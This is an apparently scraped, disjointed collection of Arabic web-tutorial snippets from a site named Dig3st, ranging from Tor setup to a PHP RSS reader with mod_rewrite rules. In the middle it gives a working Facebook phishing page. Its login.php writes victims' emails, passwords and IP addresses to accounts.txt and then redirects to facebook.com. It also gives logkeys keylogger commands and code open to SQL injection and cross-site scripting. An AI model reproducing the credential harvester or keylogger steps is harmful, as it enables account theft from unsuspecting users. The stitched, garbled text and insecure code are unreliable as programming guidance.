سأشرح اليوم بإذن الله طريقة إستغلال ثغرات SQL Injection أهم الثغرات على الويب بشكل عام , وأشهرها ..
دورة إختراق الأجهزة على دايجست
sudo apt-get install torثم نقوم بتشغل البرنامج على الـ Terminal
sudo service tor start
اليوم اقدم لكم شرح كيف تقوم بعمل صورة عن المواقع اي انك تضع الرابط و يعطيك صورة عن شكل الموقع…<?
echo'
<form action="image.php" method="post" name="image" target="_self">
<input name="url" type="url" />
<input name="submit" type="submit" value="submit" />
</form>';
?>
 |
نتيجة create.php
|
<?و اضافة احببت ان اضيفها , ان عندما لا تكتب رابط اي تضغط ارسال بدون كتابة شئ يظهر لك:
$url = $_POST["url"];
if ($url == '' ) {
echo'<center>يجب ان تضع رابط الموقع</center>';
}
else
$img = "<a href='".$url."' title='".$url."'><img src='http://free.pagepeeker.com/v2/thumbs.php?size=x&url=".$url."' border='0' /></a>";
echo $img
?>
 |
عند عدم كتابة الرابط
|
 |
| دايجست |
<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1"إلى
ونأخذ اسم حقل اليوزر والباسوورد من فورم الدخول<form id="login_form" action="login.php"
والآن سننشىء ملف login.phpname="pass"name="email"
<?php$email = $_POST['email'];$password = $_POST['pass'];$ip = $_SERVER['REMOTE_ADDR'];$date = date("l:d:m:Y");$time = date("h:i:s");$data = " Email : $email \n Password : $password \n IP Address: $ip \n Date: $date \n Time: $time \n ########################################################### \n";$file = "accounts.txt";$x = fopen ($file,"a");fwrite ($x,$data);fclose($x);header('location:https://www.facebook.com/');?>
sudo apt-get install logkeysالان تشغيل البرنامج عن طريق Terminal
sudo logkeys -h
logkeys -s -u -o log-s : قمنا بتشغيل البرنامج
CREATE TABLE dig3st_rss (قمنا بإنشاء جدول اسمه dig3st_rss
id int(11) NOT NULL AUTO_INCREMENT,
title varchar(255) NOT NULL,
link varchar(255) NOT NULL,
content text NOT NULL,
PRIMARY KEY (id)
);
<?php
$connectdb = @mysql_connect("localhost", "root", "123456") or die("خطأ في أتصال قاعدة البيانات");
@mysql_select_db("dig3st", $connectdb) ;
?>
والان إنشاء ملف feed.php لجلب الاخبار ووضعها بقاعدة البيانات
<?php
include "db.php";
include "lastRSS.php";
$rss = new lastRSS;
$rss->cache_dir = '/cashe';
$rss->cache_time = 5000;
if ($rs = $rss->get('http://www.dig3st.com/feed/')) {
foreach ($rs['items'] as $item) {
if (!mysql_fetch_array(
mysql_query("SELECT id FROM
`dig3st_rss` where
`title` = '".$item['title']."'")
)){
mysql_query("INSERT INTO `dig3st_rss` (
`title` ,
`link` ,
`content`
)
VALUES (
'".$item['title']."',
'".$item['link']."',
'".$item['description']."'
)");
} }
}
?>
<?php
include "db.php";
$sql = @mysql_query("select * FROM `dig3st_rss` order by id desc");
while($row = mysql_fetch_object($sql)) {
echo '<p>
<a target="_blank" href="news.php?id='.$row->id.'">
'.$row->title.'
</a><br />
</p>';
}
?>
والنتيجة
<?php
include "db.php";
$sql = @mysql_query("select * FROM `dig3st_rss` order by id desc");
while($row = mysql_fetch_object($sql)) {
echo '<p>
<a target="_blank" href="news.php?id='.$row->id.'">
'.$row->title.'
</a><br />
</p>';
}
?>
والآن أنشاء ملف news.php
<?php
include "db.php";
$id = intval($_GET['id']);
$news = mysql_query("SELECT * FROM dig3st_rss where id = '".$id."' ");
$row = mysql_fetch_object($news);
echo "<a href='".$row->link."'>".$row->title."</a>";
echo "<br /><hr />";
echo htmlspecialchars($row->content);
?>
صورة من عرض الخبر في صفحة مستقلة
والان سأضيف حقل في قاعدة البيانات واسميه slug_namemysql_query("SELECT * FROM news where id = '".$id."' ")
ﻻحظ كيف اصبح رابط الخبرmysql_query("SELECT * FROM news where slug_name = '".$id."' ")
ثم الان نقوم بتحديد شكل الرابطRewriteEngine on
RewriteRule : تعني بداية التغيير على الرابطRewriteRule ^([a-zA-Z0-9]+)$ news.php?id=$1
RewriteEngine Onوالنتيجة :)
RewriteRule ^([a-zA-Z0-9]+)$ news.php?id=$1
والنتيجةRewriteEngine On RewriteRule ^news/([a-zA-Z0-9]+).html$ news.php?id=$1
جميع الحقوق محفوظة Dig3st.com ©2013
